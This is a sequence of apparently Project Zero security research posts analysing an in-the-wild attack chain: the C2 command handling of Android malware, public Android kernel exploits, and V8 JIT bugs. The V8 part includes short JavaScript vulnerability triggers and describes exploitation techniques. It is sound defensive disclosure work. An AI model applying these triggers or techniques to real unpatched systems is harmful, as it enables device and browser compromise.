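```

For an analyst, the same ordered list is the set of places to look for leftover temporary files from this stage.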

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@[email protected]), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath; if it doesn’t exist, delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@[email protected]), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device, it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploits for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Android Exploits

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:



Each of the "xyz_register" functions adds an entry to the global list, consisting of a probe function, used to check whether the device is vulnerable to the given exploit and to estimate the likelihood of success, and an exploit function, used to launch the exploit. The probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.
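
The registration pattern is simple enough to sketch. The following JavaScript is only an illustration of the idea, not the attacker's native code: the names `register`, `selectBest`, `module_a` and `module_b`, the device fields, and the scores are all hypothetical, and the real framework populates its list from .init_array functions rather than from top-level calls.

```javascript
// Hypothetical illustration of a plug-in registry with probe/launch callbacks.
// None of these names or values come from the analyzed binary.
const registry = [];

function register(name, probe, launch) {
  registry.push({ name, probe, launch });
}

// probe(device) returns an estimated likelihood of success in [0, 1];
// 0 means "not applicable to this device".
register("module_a", (device) => (device.arch === "arm" ? 0.9 : 0), () => "module_a launched");
register("module_b", (device) => (device.patchYear < 2017 ? 0.5 : 0), () => "module_b launched");

// Pick the entry whose probe reports the highest non-zero score.
function selectBest(device) {
  let best = null;
  let bestScore = 0;
  for (const entry of registry) {
    const score = entry.probe(device);
    if (score > bestScore) {
      best = entry;
      bestScore = score;
    }
  }
  return best; // null when every probe returns 0
}
```

Adding another module is then a single `register` call, which is the plug-and-play property described above.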

 

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading from and writing to a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however, as you can see in the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker. It seems most likely that this was an independent implementation written after KEEN Lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root"; Baidu Security Lab "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps the exploit server URLs that we had access to were specifically configured for a user who they knew used an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

In-the-Wild Series: Chrome Exploits

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

A timeline chart depicting the extracted exploits and affected browser versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

function trigger(local_array) {
  var temp = global_array[0];
  local_array[1] = {};
  return global_array[1];
}

trigger([, {}]);
trigger([, 1.1]);

for (var i = 0; i < 10000; i++) {
  trigger([, {}]);
}

print(trigger(global_array));

The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.
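
To make the "pointer vs. unboxed double" confusion more concrete: both are just 64-bit patterns, and exploits commonly carry a pair of helpers for moving between the two views. The sketch below is not taken from the exploit; the helper names `floatToBits` and `bitsToFloat` are our own, and it only shows the reinterpretation step using standard typed arrays.

```javascript
// Two typed-array views over the same 8 bytes.
const buffer = new ArrayBuffer(8);
const asFloat = new Float64Array(buffer);
const asInt = new BigUint64Array(buffer);

// Reinterpret an IEEE 754 double as its raw 64-bit pattern.
function floatToBits(value) {
  asFloat[0] = value;
  return asInt[0];
}

// Reinterpret a raw 64-bit pattern as a double.
function bitsToFloat(bits) {
  asInt[0] = bits;
  return asFloat[0];
}

console.log(floatToBits(1.1).toString(16)); // 3ff199999999999a
```

With a type confusion in hand, a value leaked as a double can be decoded into an address with `floatToBits`, and a chosen address can be encoded with `bitsToFloat` before being written into the confused array.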

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made the alias analyzer use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {
  [...]
     // Constant objects can be distinguished statically.
-    if (a->IsConstant()) {
+    if (a->IsConstant() && b->IsConstant()) {
       return a->Equals(b) ? kMustAlias : kNoAlias;
     }
     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, covering a period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind, as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue; for example, their trigger function is much more straightforward than the one in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';
(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        popped = Array.prototype.pop.call(array);
      }
      var temp = array[0];
      return Reflect.construct(constructor, arguments, new_target);
    }

    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);

  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
  }

  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });

  trigger(proxy);
  print(popped);
}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.
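
The side effect that the compiler failed to model can be observed in plain JavaScript, with no JIT involved. The following sketch (our own illustration, with a hypothetical `Plain` constructor and `observed` log) shows that constructing an object with a proxy as new_target invokes the proxy's get handler for the "prototype" property, which is exactly where the attacker's handler gets a chance to modify the array:

```javascript
const observed = [];

// A proxy around Object that records every property read.
const proxy = new Proxy(Object, {
  get(target, key, receiver) {
    observed.push(String(key));
    return Reflect.get(target, key, receiver);
  },
});

function Plain() {}

// Object creation looks up new_target.prototype, which runs the handler.
const instance = Reflect.construct(Plain, [], proxy);

console.log(observed); // [ 'prototype' ]
console.log(Object.getPrototypeOf(instance) === Object.prototype); // true
```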

Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
[...]
  InferReceiverMapsResult result = kReliableReceiverMaps;
[...]
    case IrOpcode::kJSCreate: {
      if (IsSame(receiver, effect)) {
        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
        if (initial_map.has_value()) {
          *maps_return = ZoneHandleSet<Map>(initial_map->object());
          return result;
        }
        // We reached the allocation of the {receiver}.
        return kNoReceiverMaps;
      }
+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
      break;
    }
[...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
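
For reference, this is the benign behavior that the leak primitive subverts. In an uncorrupted engine, converting a class constructor to a string returns exactly the slice of the script source that holds the class definition. The class name `Sample` below is just an example of ours:

```javascript
class Sample {
  constructor() {
    this.value = 1;
  }
}

// The engine slices the class text out of the script source using the
// stored start and end positions.
const text = Sample.toString();
console.log(text.startsWith("class Sample")); // true
console.log(text.endsWith("}")); // true
```

If the two stored positions are replaced with attacker-chosen values, the same slicing operation returns whatever bytes happen to lie in that range instead.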

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {
  var stack = (new Error).stack;
  if (stack.indexOf("Number (") == -1) {
    jit_detector.is_compiled = true;
  }
};
function trigger(array, proxy) {
  if (!jit_detector.is_compiled) {
    Number(jit_detector);
  }
[...]

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.
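
A standalone version of the same check is sketched below. It is our own simplification rather than the exploit's code: the names `detector`, `sawBuiltinFrame` and `probe` are hypothetical, and whether a "Number (" frame appears depends on the engine, its version, and the compilation tier, so the result should be treated as a heuristic.

```javascript
const detector = { sawBuiltinFrame: null };

// Number(detector) converts the object to a primitive, which calls this
// function; the stack trace captured here reflects how Number was invoked.
detector[Symbol.toPrimitive] = function () {
  const stack = new Error().stack;
  detector.sawBuiltinFrame = stack.indexOf("Number (") !== -1;
  return 0;
};

function probe() {
  return Number(detector);
}

probe();
console.log(detector.sawBuiltinFrame);
```

The exploit simply inverts this flag: once the builtin frame disappears from the trace, it concludes that the caller has been optimized and the call to Number has been inlined.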

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {
  function inner(new_target) {
    popped = array.pop(
        Reflect.construct(function() { }, arguments, new_target));
  }

  inner(new_target);
}

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.
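
The language-level ordering that this trick relies on is easy to confirm: in a call expression, the callee property is loaded before the arguments are evaluated. The sketch below is only an illustration with made-up names (`receiver`, `method`, `argument`); it says nothing about how TurboFan schedules nodes beyond showing that this order is the one the specification mandates.

```javascript
const log = [];

const receiver = {
  // A getter lets us observe the moment the property is loaded.
  get method() {
    log.push("property load");
    return function () {
      log.push("call");
    };
  },
};

function argument() {
  log.push("argument evaluated");
}

receiver.method(argument());
console.log(log.join(" -> ")); // property load -> argument evaluated -> call
```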

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant number of numeric and string literals were updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;

function trigger() {
  let array = [1.1, 1.1];

  let index = arguments.length;
  index = index - 65534;
  index = Math.max(index, 0);

  return array[index] = 2.2;
}

for (let i = 0; i < 20000; i++) {
  trigger(1,2,3);
}

print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.
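
The mismatch between the assumed range and the real value can be seen without any JIT involvement. In the sketch below, the function name, the constant name and the argument count of 66000 are our own choices (the count is kept modest to stay well within typical stack limits); the 65534 bound is the one described above.

```javascript
function countArguments() {
  return arguments.length;
}

// Upper bound that the typer assumed for arguments.length.
const ASSUMED_MAX = 65534;

// Function.prototype.apply is not subject to that limit.
const actual = countArguments.apply(null, new Array(66000));

// The same arithmetic as in the trigger function: the typer believes this
// is always 0, but at runtime it is positive.
const index = Math.max(actual - ASSUMED_MAX, 0);

console.log(actual); // 66000
console.log(index); // 466
```

Since the compiler believes `index` can only be 0, it considers the bounds check on a two-element array redundant and removes it.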

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

